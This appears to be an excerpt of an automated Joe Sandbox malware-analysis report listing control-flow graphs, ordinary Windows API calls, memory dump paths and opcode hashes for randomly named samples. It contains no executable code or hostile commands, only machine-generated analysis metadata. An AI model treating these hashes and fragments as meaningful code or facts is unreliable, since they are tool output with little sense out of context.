                                                                                                                                                                                                                                          control_flow_graph 884 53a5465-53a54d6 886 53a54d8-53a54de 884->886 887 53a54e1-53a54e8 884->887 886->887 888 53a54ea-53a54f0 887->888 889 53a54f3-53a552b 887->889 888->889 890 53a5533-53a5592 CreateWindowExW 889->890 891 53a559b-53a55d3 890->891 892 53a5594-53a559a 890->892 896 53a55e0 891->896 897 53a55d5-53a55d8 891->897 892->891 898 53a55e1 896->898 897->896 898->898
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053A5582
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2117174698.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_53a0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                                                                          • Opcode ID: a4a725f7740582ef296b6c1eeee7e1376c3d9491eb15f9ef40801f6da130bdab
                                                                                                                                                                                                                                          • Instruction ID: 1302fe18e5b8849c61a13b2fbe7961bac1e4d2c7471257c7bed4599655a50f7b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4a725f7740582ef296b6c1eeee7e1376c3d9491eb15f9ef40801f6da130bdab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4519FB1D003499FDF14CFA9C984ADEBBB6FF48314F24812AE819AB250D775A945CF90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 899 53a49f4-53a7a7c 904 53a7b2c-53a7b4c call 53a48cc 899->904 905 53a7a82-53a7a87 899->905 912 53a7b4f-53a7b5c 904->912 907 53a7ada-53a7b12 CallWindowProcW 905->907 908 53a7a89-53a7ac0 905->908 910 53a7b1b-53a7b2a 907->910 911 53a7b14-53a7b1a 907->911 914 53a7ac9-53a7ad8 908->914 915 53a7ac2-53a7ac8 908->915 910->912 911->910 914->912 915->914
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 053A7B01
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2117174698.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_53a0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                                                                                                                          • Opcode ID: 2067df2c22d54440359f15bcdb9cd3ca36516dcdffa70ba243c52f9062b3350a
                                                                                                                                                                                                                                          • Instruction ID: bdd819609ff488f94c3aab9a351ae952ccf45950dfbe56598b53676d2624584d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2067df2c22d54440359f15bcdb9cd3ca36516dcdffa70ba243c52f9062b3350a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C4128B5A00305DFCB14DF99C488AAABBF5FB88314F24C459D519AB321D375A941CBA0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 935 2c8959c-2c895a4 936 2c895a8-2c89669 CreateActCtxA 935->936 938 2c8966b-2c89671 936->938 939 2c89672-2c896cc 936->939 938->939 946 2c896db-2c896df 939->946 947 2c896ce-2c896d1 939->947 948 2c896f0 946->948 949 2c896e1-2c896ed 946->949 947->946 951 2c896f1 948->951 949->948 951->951
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 02C89659
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2109676526.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2c80000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                                          • Opcode ID: 06e541f1299419e11236998764646733090143d384fcd3c340e1702348063548
                                                                                                                                                                                                                                          • Instruction ID: be291d9f75732310526ed74cde05abb19032990ea9904709adef4bc447c10ea9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06e541f1299419e11236998764646733090143d384fcd3c340e1702348063548
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 794112B0C00759CBDB24DFA9C984BDEBBF5BF49308F20806AD408AB255DB756946CF90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 918 2c87d68-2c89669 CreateActCtxA 921 2c8966b-2c89671 918->921 922 2c89672-2c896cc 918->922 921->922 929 2c896db-2c896df 922->929 930 2c896ce-2c896d1 922->930 931 2c896f0 929->931 932 2c896e1-2c896ed 929->932 930->929 934 2c896f1 931->934 932->931 934->934
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 02C89659
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2109676526.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2c80000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                                          • Opcode ID: 58f66993473287995baa8313d090670598a2f9c5d9e6703c394cac5244692ca1
                                                                                                                                                                                                                                          • Instruction ID: 14b3be470a2c515a0f598917d19b54e4bfb3cc3cd711e656f3bed20ce5ea2cf9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58f66993473287995baa8313d090670598a2f9c5d9e6703c394cac5244692ca1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 974112B0C00759CBDB24DFA9C984B9EBBF5FF49308F20806AD408AB255DB756946CF90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 952 2c8e638-2c8ede0 954 2c8ede8-2c8ee17 LoadLibraryExW 952->954 955 2c8ede2-2c8ede5 952->955 956 2c8ee19-2c8ee1f 954->956 957 2c8ee20-2c8ee3d 954->957 955->954 956->957
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C8EBF9,00000800,00000000,00000000), ref: 02C8EE0A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2109676526.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2c80000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                          • Opcode ID: 040d4fd03695ca02f1a0fd817a1fd207d9ecf7fa4f1a8f62c0462cdb630b2222
                                                                                                                                                                                                                                          • Instruction ID: 2f5687737928fadabfbceb354c34916ff7512e9e5d7bf8cd7873828b12dd460d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 040d4fd03695ca02f1a0fd817a1fd207d9ecf7fa4f1a8f62c0462cdb630b2222
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 901126B69003499FDB10DF9AC548ADEFBF5EF89314F10842EE519A7200C379A545CFA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 053EE9A2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2117341470.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_53e0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 530164218-0
                                                                                                                                                                                                                                          • Opcode ID: a6fe7146ad803d8a4a335a146e4861add962961c6688d9c1c9a906174767310f
                                                                                                                                                                                                                                          • Instruction ID: a621534b233d6eb36ac3b55b4780bf4130dde9f34aff08a8ac8d297cee4cbf83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6fe7146ad803d8a4a335a146e4861add962961c6688d9c1c9a906174767310f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 251126B68002498FDB14CF9AC544BDEFBF9FF88310F10842AE869A3240D379A545CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 053EE9A2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2117341470.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_53e0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 530164218-0
                                                                                                                                                                                                                                          • Opcode ID: 045aedfe857213f24ef4ae86200a7b421d29299121029e3cbc405d70ad7d4bb4
                                                                                                                                                                                                                                          • Instruction ID: dc4d959f71023516e118a01fb94a1588b7b8cf0bde1423b2be3cc9b8959d580c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 045aedfe857213f24ef4ae86200a7b421d29299121029e3cbc405d70ad7d4bb4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B1147B68002498FDB10CF9AC544BEEFBF4BF48310F14845AD868A3240D338A545CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,053A56A0,?,?,?,?), ref: 053A5715
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2117174698.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_53a0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                                                                          • Opcode ID: b2cc2040e73142aaa3bc908b0edb10daf9dd706952c61bd816bc56cf11feb4ca
                                                                                                                                                                                                                                          • Instruction ID: 02179c40fd5b03e756f783ec3c18057a8a73b6c1fba2a768f6f1d4f7e8b43952
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2cc2040e73142aaa3bc908b0edb10daf9dd706952c61bd816bc56cf11feb4ca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9211F2B5800248DFDB10DF9AC589B9EBBF8EB48320F10845AE959A7610D379A944CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8EB7E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2109676526.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2c80000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                                          • Opcode ID: 56592db9d6b903c2d505efdb12254b03496da1584c9d8b4a4530e9fa42af2389
                                                                                                                                                                                                                                          • Instruction ID: 06558999dd4383ad14122b66941ad150828716b0b6126ac4d34b2416fedc4011
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56592db9d6b903c2d505efdb12254b03496da1584c9d8b4a4530e9fa42af2389
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE110FB5C003498FDB20DF9AC544A9EFBF4EB89224F10841AD829A7210D379A545CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,053A56A0,?,?,?,?), ref: 053A5715
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2117174698.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_53a0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1378638983-0
                                                                                                                                                                                                                                          • Opcode ID: f452cc3c5e4d548192cd3a843cf347a3724b2d233b5e1bfd5df58ee610134e1b
                                                                                                                                                                                                                                          • Instruction ID: 07514374f33d46c5b0c25a7c13be507b279bf5863e6616d0809047f4e945f40f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f452cc3c5e4d548192cd3a843cf347a3724b2d233b5e1bfd5df58ee610134e1b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F1103B5800248CFDB10DF99C585BDEBBF8FB48320F10841AD918B3640D379A944CFA5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2118529316.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_75e0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 10fb09628df48c7bc1a4cb26a078464a0ab872d402abeff366df6d6580867dc4
                                                                                                                                                                                                                                          • Instruction ID: 20a6579ec2f63c1789b02f6875e81e65ddc88503cc97c6c98b323f762c780580
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10fb09628df48c7bc1a4cb26a078464a0ab872d402abeff366df6d6580867dc4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D31E6B4D09219CFEB48CFA9C8447EEBBF5FB4A300F14956AD41DA3291D7B84A41CB94
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2118529316.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_75e0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 26f5263c331bedad2f5b84159368d432832ce8b04c82017c2bea0add45bc3793
                                                                                                                                                                                                                                          • Instruction ID: 8f2f3a480546f4f5ace1a061dfdee6886cf6956701ad0cc0a0a8357aeaf6f8f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26f5263c331bedad2f5b84159368d432832ce8b04c82017c2bea0add45bc3793
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1631D6B4D09219CFEB48CFA9C4446FEBBF9FB4A300F14956AD01DA3291D7B44640CB94
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2103897350.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_108d000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a25d534b36a3cfc925fa94ebbb40e9b58fe55404876afa92835209e3f3fd94a2
                                                                                                                                                                                                                                          • Instruction ID: 4bb4cbcbcdd920bfaf3cff460b5fe09705b4de74c075056e9dcbaa3e9df7e8e6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a25d534b36a3cfc925fa94ebbb40e9b58fe55404876afa92835209e3f3fd94a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6121FB71508204DFDB05EF58D5C0F16BFA5FB98318F2486AAD9890B296C336D455C7B1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2105201737.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_11fd000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1cb1da126072aeba5a72d4c126f4ee37d111f13f42077a5bf9dee079c64de23e
                                                                                                                                                                                                                                          • Instruction ID: 35e931df96a0d5bf5e936e4db6111b84a8e60f6ec28639cb9e1751cc1a5f40f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cb1da126072aeba5a72d4c126f4ee37d111f13f42077a5bf9dee079c64de23e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E21F271604204DFDF19DF68E984B26BF65FB88354F24C56DEA0A4B356C33AD407CA62
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2105201737.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_11fd000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5953a02965f1a846d593c1bb78de14b6b122e3f798509e99d3fab3eae17b33f3
                                                                                                                                                                                                                                          • Instruction ID: c9d22bfe0466717e3c1d8e4d7e49b115b107594aa9dc877e57a82d8575673a5c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5953a02965f1a846d593c1bb78de14b6b122e3f798509e99d3fab3eae17b33f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94210775504204DFDF09DF98E5C0F36BB65FB84324F20C56DEA094B256C33AD406CAA2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2105201737.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_11fd000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7e0d837b520cd5f8785201adc8934826016b4510307e84ed6f07556ee2c14f1f
                                                                                                                                                                                                                                          • Instruction ID: 40e29b9b89e5aedd89232652b5d11ccb5226473af13e9b7cd77dddbdb286d93f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e0d837b520cd5f8785201adc8934826016b4510307e84ed6f07556ee2c14f1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18219D755093808FDB07CF24D994B15BF71EB46214F28C5EED9498F6A7C33A980ACB62
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2103897350.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_108d000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                          • Instruction ID: d1e4f72f8dfa9c723947a37673e6a9d5568b0062408e4b14ee10f8eec54cc9b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21110372404240CFCB02DF44D5C4B16BFB1FB88324F24C6AAD9890B257C33AD45ACBA2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2105201737.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_11fd000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                                                                                                                          • Instruction ID: c19e42b2f5001c6c48e35e3286cc28408dae9853b67370779e0eba6e18757325
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E11BB79504280DFDB06CF54D5C4B25BFA1FB84224F24C6AED9494B296C33AD40ACBA2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2118529316.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_75e0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 92da3d04df23c0f03ddd71e222df7b52392c009b586bee68db9cd6f3e78590ee
                                                                                                                                                                                                                                          • Instruction ID: 8c2b6eb92ad89fb02bd262b79c670634936cb6f4a3893ce2c95d50c274c14152
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92da3d04df23c0f03ddd71e222df7b52392c009b586bee68db9cd6f3e78590ee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4501D6717445018FC318DF2ED894A66BBE6FFC8611B1885BDE14DCB762DA30D801CB40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2118529316.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_75e0000_Z73fDV6g4L.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7636d50a760fb42acd96e652202cbb939b708b2c441f5bea3328540ea51ca8f0
                                                                                                                                                                                                                                          • Instruction ID: fe8f287468315ee2b10b1ed3999288f8daf7b75416d5b8d757475e71d091d927
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7636d50a760fb42acd96e652202cbb939b708b2c441f5bea3328540ea51ca8f0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9018F71740A118FC728DF2ED984A6AB7EAFFC8625718857DE14DCB765DA30D801CB40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 388e250737ef914b161148fb3cdc34e34a80b132f05dfc8ee9aa364e400ab0c9
                                                                                                                                                                                                                                          • Instruction ID: 5dd299880abb4cd0f936db03ae7222527e3499cb6b34e2ffc559a68484e6f199
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 388e250737ef914b161148fb3cdc34e34a80b132f05dfc8ee9aa364e400ab0c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7012DD31A012099FDF55DF68D980A9EBBF6EF85310F148569E4059B2A1DB34ED0ACFA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9639c615958d6c43bfe6b2c6121759681b1b95ab2dccd56cb012591e888e18a4
                                                                                                                                                                                                                                          • Instruction ID: fcae9a50aa78f36520e594a218f267f8e81aeca784ea9d220303b771631f62ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9639c615958d6c43bfe6b2c6121759681b1b95ab2dccd56cb012591e888e18a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65D1F634D00618CFCB18EFB4D854A9DBBB2FF8A311F1081ADD50AA7254DB35998ADF51
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ec4d03f9236af9a644bfe82e20592c709290eabf0f01b8c59235b223f1b0f193
                                                                                                                                                                                                                                          • Instruction ID: 2bac7b3b6b830e5e1be0e661deefece64b54451e360628997385557ab43caef4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec4d03f9236af9a644bfe82e20592c709290eabf0f01b8c59235b223f1b0f193
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30D1E534D00618CFCB18EFB4D854A9DBBB2FF8A311F1081A9D50AAB254DF35998ADF51

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
